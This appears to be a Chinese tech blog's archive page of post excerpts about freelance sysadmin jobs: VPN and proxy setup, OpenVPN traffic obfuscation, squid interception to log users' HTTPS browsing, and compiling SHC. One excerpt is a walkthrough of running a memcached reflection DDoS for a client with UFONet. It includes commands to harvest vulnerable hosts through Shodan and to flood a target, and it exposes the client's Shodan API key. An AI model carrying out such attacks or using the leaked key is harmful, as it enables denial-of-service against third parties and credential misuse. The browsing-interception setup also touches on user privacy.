所有文章

先普及一下IPv6 地址。 IPv6 地址大小为 128 位。 首选 IPv6 地址表示法为8组数字用冒号分隔，其中每组是 8 个 16 位部分的十六进制值。IPv6 地址范围从 0000:0000:0000:0000:0000:0000:0000:0000 至 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff。 除此首选格式之外，IPv6 地址还可以用其他两种短格式指定： 省略前导零 通过省略前导零指定 IPv6 地址。 例如，IPv6 地址 1050:0000:0000:0000:0005:0600:300c:326b 可写作 1050:0:0:0:5:600:300c:326b。 双冒号 通过使用双冒号（::）替换一系列零来指定 IPv6 地址。 例如，IPv6 地址 ff06:0:0:0:0:0:0:c3 可写作 ff06::c3。 一个 IP 地址中只可使用一次双冒号。 在一般IPv6网络环境下，一个局域网的子网大小为/64，接口通过NDP协议获得自己的唯一IPv6地址（前64位为子网前缀，后64位一般由接口本身的MAC地址产生） 我们的场景： 服务器的IPV4地址是 1.2.3.4 服务器的IPV6地址是 aaaa:bbbb:cccc:dddd::/64 IPV4和IPV6的地址都在eth0上 VPN分配给客户端的IPV6地址是aaaa:bbbb:cccc:dddd:80::/112，使用的接口是tun0 配置过程如下： 首先修改/etc/sysctl.conf文件 net.ipv4.ip_forward=1 ... net.ipv6.conf.all.forwarding=1 net.ipv6.conf.all.proxy_ndp = 1 ... net.ipv4.conf.all.accept_redirects = 0 net.ipv6.conf.all.accept_redirects = 0 ... net.ipv4.conf.all.send_redirects = 0 接下来，可以先做iptable，使得openvpn server对包进行SNAT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 或者 iptables -t nat -A POSTROUTING -s 10.11.0.0/16 -j SNAT --to 172.16.8.1 编辑/etc/openvpn/variables变量 ...

我们tomcat的日志记录格式为： pattern="%a|%A|%T|%{X-Forwarded-For}i|%l|%u|%t|%r|%s|%b|%{Referer}i|%{User-Agent}i " resolveHosts="false"/> 都是什么意思呢？ %a - Remote IP address %A - Local IP address %b - Bytes sent, excluding HTTP headers, or ‘-’ if zero %B - Bytes sent, excluding HTTP headers %h - Remote host name (or IP address if resolveHosts is false) %H - Request protocol %l - Remote logical username from identd (always returns ‘-’) %m - Request method (GET, POST, etc.) %p - Local port on which this request was received %q - Query string (prepended with a ‘?’ if it exists) %r - First line of the request (method and request URI) %s - HTTP status code of the response %S - User session ID %t - Date and time, in Common Log Format %u - Remote user that was authenticated (if any), else ‘-’ %U - Requested URL path %v - Local server name %D - Time taken to process the request, in millis %T - Time taken to process the request, in seconds %I - Current request thread name (can compare later with stacktraces) 另外，还可以将request请求的查询参数、session会话变量值、cookie值或HTTP请求/响应头内容的变量值等内容写入到日志文件。 ...

Freelancer上有个proxy setup的任务： Project Description Hi, I would like to create a new VPS proxy server with multiple IPs on the same VPS. Are you able to that? What OS do you prefer? - I have 10 ips. - I want them to be as much anonymous as you can. - I would have an Username and Password as auth, but if needed the possibility to have an IP authentication too. My budget is: ~20$ Thank you in advance. 说老实话，10个IP没必要，一个IP足够了，用Tor+polipo即可。 ...

这个很奇怪撒，仔细查了下，原作者是这么说的： I have created a patch which introduces some forms of scrambling to the packet payload of any OpenVPN connection. I have been successfully using the patch with Iranian and Chinese users for some time now. 看来伊朗也比较糟糕啊。 无语，鉴于在森华易腾无法建openvpn，不知道是直接封了1194的udp端口，还是从协议上封掉了openvpn，总之，都很shit。 简单说就是对openvpn协议进行了混淆，多了一个配置项： scramble 参数 scramble reverse #对传输的数据进行反转，通常这一句就已经可以绕过China和Iran的检测机制了 scramble xorptrpos #对传输的package中的有效数据进行xor运算 scramble obfuscate password #更强烈的加密。反转+xor+密码三种方式全用上. "password" 是你设定的密码 用上这个配置项后，建议设置cipher none, 因为如此这般以后，没有必要再制定cipher方式了。另外，用cipher会消耗cpu，而采用scramble消耗cpu的程度比cipher低。 搭一个试试看 这里采用的是openvpn 2.4.4版本和相应的patch 下载： 2.4.4.zip master.zip #centos yum -y install unzip yum -y groupinstall "development tools" #ubuntu apt update apt install build-essential unzip -x 2.4.4.zip unzip -x master.zip 应用补丁： ...

任务的要求是： • Multiple subnets to avoid bans •I need the proxies to have the ability of User:Pass •Proxy needs to be Residential IPv6 还给出了一个参考： https://www.blackhatworld.com/seo/never-buy-proxies-again-setup-your-own-proxy-server.872539/ 恩，比较有意思。按照他给的连接： 第一步去 LowEndBox.com 或者 Webhostingtalk.com 去找一家口碑比较好，而且能提供附加ip的VPS供应商，通常附加一个IP是1$一个月。 第二步买个VPS，配置是1G内存，1个内核，100M带宽，并且附加10个IP。 这样的VPS一般是5$一个月，10$10个ip一个月，合计15$一个月，100元人民币，这样你就有11个IP可用了。 按这个任务的要求，需要Multiple subnet，你就从这家供应商的不同地点多买几台，比如洛杉矶1台，德州1台，纽约1台，然后每台附加10个IP 第三步就是安装Proxy软件了： 下载3Proxy wget http://img.rendoumi.com/soft/3proxy/0.8.11.tar.gz tar zxvf 0.8.11.tar.gz 编译安装： cd 3proxy-0.8.11 sed -i 's/^prefix.*/prefix=\/usr\/local\/3proxy/' Makefile.Linux sed -i '/DENY.*/a #define ANONYMOUS 1' src/proxy.h make -f Makefile.Linux make -f Makefile.Linux install 注意上面我是安装到了/usr/local/3proxy，大家可以根据需求修改。 看看配置都是什么 cat cfg/3proxy.cfg.sample |grep -v ^# | grep -v ^$ nserver 10.1.2.1 nserver 10.2.2.2 nscache 65536 timeouts 1 5 30 60 180 1800 15 60 users 3APA3A:CL:3apa3a "test:CR:$1$qwer$CHFTUFGqkjue9HyhcMHEe1" service log c:\3proxy\logs\3proxy.log D logformat "- +_L%t.%. %N.%p %E %U %C:%c %R:%r %O %I %h %T" archiver rar rar a -df -inul %A %F rotate 30 auth iponly external 10.1.1.1 internal 192.168.1.1 auth none dnspr auth strong deny * * 127.0.0.1,192.168.1.1 allow * * * 80-88,8080-8088 HTTP allow * * * 443,8443 HTTPS proxy -n auth none pop3p tcppm 25 mail.my.provider 25 auth strong flush allow 3APA3A,test maxconn 20 socks auth strong flush internal 127.0.0.1 allow 3APA3A 127.0.0.1 maxconn 3 admin 一堆的废物配置啊，统统去掉 ...

这个需求也比较简单： User Browsing Log for Open VPN server 简单说就是用户连到他的openvpn服务器，通过上面的squid代理来浏览其他网站，比较特别的是需要查看用户http和https的浏览记录。 squid做透明代理，这样就可以截取浏览记录并且提供加速了 服务器是Ubuntu，缺省安装的的squid是不支持SSL的，所以需要重新编译一个 安装依赖包： sudo apt-get install build-essential fakeroot devscripts gawk gcc-multilib dpatch sudo apt-get build-dep squid3 sudo apt-get build-dep openssl sudo apt-get install libssl-dev sudo apt-get source squid3 下载到squid的源代码，以及ubuntu的修改包，解压并释放： tar zxvf squid3_3.5.12.orig.tar.gz cd squid3-3.5.12 tar xf ../squid3_3.5.12-1ubuntu7.5.debian.tar.xz 修改参数增加对ssl的支持： vi debian/rules Add --with-openssl --enable-ssl --enable-ssl-crtd under the DEB_CONFIGURE_EXTRA_FLAGS section. DEB_CONFIGURE_EXTRA_FLAGS := BUILDCXXFLAGS="$(CXXFLAGS) $(LDFLAGS)" \ ... --with-default-user=proxy \ --with-openssl \ --enable-ssl \ --enable-ssl-crtd ... 编译，会生成7个deb包 ...

这个任务很有意思 任务描述： we need a set of vpn server / client programmed for embedded linux (or windows) to bond multiple 4g lte modems or wifi connectios and stitch them back together on server side to stream video feeds. the connection must be stable and have the maximum available bandwidth with no drop in some connection drops. simillar to service called SPEEDIFY (but it doesn't work well) this can be also achieved by splitting video packets and send them through different links and stitch the video packets back on the server side. 简单说，很可能它这边是个嵌入式系统，树莓派、nanopi之流的，接了4G的无线上网卡，想去聚合链路上传流媒体。 ...

这是一次失败的任务，即使再来一次，依然会失败，因为无法验证，真够shit的，扣了我10$的手续费。 记录一下，以儆效尤。 任务如下： Job would be to compile an ipk file of SHC that would work with LEDE OS (openwrt) and the processor used in our system - will provide details SHC can be downloaded here: http://www.datsi.fi.upm.es/~frosal/ I think you must have a 64 bit system to use the SDK to compile the file 翻译一下：在OpenWRT平台下编译一个SHC，并且能工作。 完全步骤如下： How to compile SHC on LEDE: Tested build environment: OS: Ubuntu 14.04.5 LTS CPU: ARMv7 Processor rev 5 (v7l) Before you begin, check your system is updated, i.e. sudo apt-get update sudo apt-get upgrade sudo apt-get autoremove Step-by-step manual: Note: perform all steps as regular (non-root) user. User must be in sudo group. 1. Update your sources sudo apt-get update 2. Install nesessary packages: sudo apt-get install g++ libncurses5-dev zlib1g-dev bison flex unzip autoconf gawk make gettext gcc binutils patch bzip2 libz-dev asciidoc subversion sphinxsearch libtool sphinx-common libssl-dev libssl0.9.8 3. Get latest LEDE source from git repository We know our CPU is armv7, it belongs to arm64, so go to http://downloads.lede-project.org/releases , just download sdk. wget http://downloads.lede-project.org/releases/17.01.4/targets/arm64/generic/lede-sdk-17.01.4-arm64_gcc-5.4.0_musl-1.1.16.Linux-x86_64.tar.xz 4. No Need to Update and install all LEDE packages We just want to compile shc, not other packages , so don't update. 5. Run 'make menuconfig' (Just Save and Exit) 6. Get SHC sources to LEDE package tree (we are and shc-3.8.9b.tgz is in source directory) wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9b.tgz mkdir -p package/shc/src tar xvf shc-3.8.9b.tgz -C package/shc/src --strip-components 1 7. Make ipk Makefile vi package/shc/Makefile ############################################## # OpenWrt Makefile for shc program # # # Most of the variables used here are defined in # the include directives below. We just need to # specify a basic description of the package, # where to build our program, where to find # the source files, and where to install the # compiled program on the router. # # Be very careful of spacing in this file. # Indents should be tabs, not spaces, and # there should be no trailing whitespace in # lines that are not commented. # ############################################## include $(TOPDIR)/rules.mk # Name and release number of this package PKG_NAME:=shc PKG_VERSION:=3.8.9b PKG_MAINTAINER:=Francisco, Rosales, <frosal@fi.upm.es> # This specifies the directory where we're going to build the program. # The root build directory, $(BUILD_DIR), is by default the build_mipsel # directory in your OpenWrt SDK directory PKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME) include $(INCLUDE_DIR)/package.mk # Specify package information for this program. # The variables defined here should be self explanatory. # If you are running Kamikaze, delete the DESCRIPTION # variable below and uncomment the Kamikaze define # directive for the description below define Package/$(PKG_NAME) SECTION:=utils CATEGORY:=Utilities TITLE:= shc ---- This tool generates a stripped binary executable version of the script specified at command line. URL:=http://www.datsi.fi.upm.es/~frosal endef # Uncomment portion below for Kamikaze and delete DESCRIPTION variable above define Package/$(PKG_NAME)/description shc ---- This tool generates a stripped binary executable version of the script specified at command line." endef # Specify what needs to be done to prepare for building the package. # In our case, we need to copy the source files to the build directory. # This is NOT the default. The default uses the PKG_SOURCE_URL and the # PKG_SOURCE which is not defined here to download the source from the web. # In order to just build a simple program that we have just written, it is # much easier to do it this way. define Build/Prepare mkdir -p $(PKG_BUILD_DIR) $(CP) ./src/* $(PKG_BUILD_DIR)/ endef # We do not need to define Build/Configure or Build/Compile directives # The defaults are appropriate for compiling a simple program such as this one # Specify where and how to install the program. Since we only have one file, # the helloworld executable, install it by copying it to the /bin directory on # the router. The $(1) variable represents the root directory on the router running # OpenWrt. The $(INSTALL_DIR) variable contains a command to prepare the install # directory if it does not already exist. Likewise $(INSTALL_BIN) contains the # command to copy the binary file from its current location (in our case the build # directory) to the install directory. define Package/$(PKG_NAME)/install $(INSTALL_DIR) $(1)/bin $(INSTALL_BIN) $(PKG_BUILD_DIR)/shc $(1)/bin/ endef # This line executes the necessary commands to compile our program. # The above define directives specify all the information needed, but this # line calls BuildPackage which in turn actually uses this information to # build a package. $(eval $(call BuildPackage,$(PKG_NAME))) 8. Compile shc ipk without errors. make package/shc/compile V=99 9. Building process complete witout errors. Now we have : binary packages directory: source/bin/packages/aarch64_armv8-a/ [SHC_BIN] = ./bin/packages/aarch64_armv8-a/base/shc_3.8.9b_aarch64_armv8-a.ipk 10. Copy and install SHC .ipk to LEDE device. scp shc_3.8.9b_aarch64_armv8-a.ipk root@<LEDE device IP address or name>:/tmp/ ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1 opkg install shc_3.8.9b_aarch64_armv8-a.ipk 11. Create test script and compile it to execute. (in LEDE shell) ssh root@<LEDE device IP address or name> #IP usually 192.168.1.1 vi /tmp/1.sh #!/bin/sh echo "hahahaha" shc -v -f /tmp/1.sh /tmp/1.sh.x 这里面有几个注意点，一个是网上有很多教程，上去就是 ...

这是一次差点蚀把米的过程啊，最后争议拿回了自己的手续费，白干了一场啊，真够倒霉的。 韩国人要反射攻击。 首先clone项目： git clone https://github.com/epsylon/ufonet 原理很清楚，通过memcache的漏洞，memcache居然是UDP的，伪造源地址，发一堆请求到有漏洞的memchache，引起反射攻击。 一堆有漏洞的机器从哪获得呢？这个韩国人真的有Shodan API，手榴弹？ 他的账号，确实可以看到一堆有毛病的机器 0ptoLUtmkSJ8DbAvyZ8PevTRsyLoxEuN 安装python: wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz tar zxvf Python-2.7.14.tgz cd Python-2.7.14 ./configure --prefix=/export/servers/Python2714 make make install wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python /export/servers/Python2714/bin/pip install pycurl /export/servers/Python2714/bin/pip install geoip /export/servers/Python2714/bin/pip install whois /export/servers/Python2714/bin/pip install crypto /export/servers/Python2714/bin/pip install request 先去拿一堆漏洞机器的列表 cd ufonet /export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa 轰击： /export/servers/Python2714/bin/python ./ufonet./ufonet -a http://target.com -r 10000 --threads 2000

雇主给了个难题，他搭建了一个openvpn，并且有两个DNS Server，一个是带AD广告过滤的，一个是不带的。这两个dns服务在同一个机器上，端口不同。 他想让在openvpn的client端配置一下，让客户使用不同的dns server。 找了半天，没有能修改dns port的配置。 于是曲线救国。 方案如下：客户端固定IP，根据不同的来源IP来分发到不同的DNS去。 本来是想用V2EX一个哥们自己写的glider，弄了半天，不知道怎么配，不过功能肯定是能实现的。最差就是自己改go代码了。 快速起见，用了另外一个哥们的dns-dispatcher，就是dns分发，glider是彻底的各种代理转发，链条代理，非常强悍。 克隆dns-dispatcher代码 git clone https://github.com/cathuhoo/dns-dispatcher 编译： make 配置，我们只配置了udp的53端口，标准的DNS端口 vi dns-dispatch.config ; This is a test configuration file [main] file_resolvers = resolvers.txt file_policy = policy.txt file_log = /var/log/dns-dispatch.log file_pid = /var/run/dns-dispatch.pid num_threads = 3 service_port = 53 #tcpservice_port = 53 daemonize = yes 配置策略： vi policy.txt ip2 | * | Forward:bind2 ip1 | * | Forward:bind1 配置ip1和ip2 vi ip1 10.10.1.2 vi ip2 10.10.1.3 配置bind1和bind2，两个dns在10.10.1.1上，端口分别是5301和5302 vi resolvers.txt bind1|10.10.1.1|5301 bind2|10.10.1.1|5302 运行： sudo ./dns-dispatch -c dns-dispatch.config OK，搞定，所有的配置都在文件里，还有别的用法，大家用的话自己看文档吧。 ...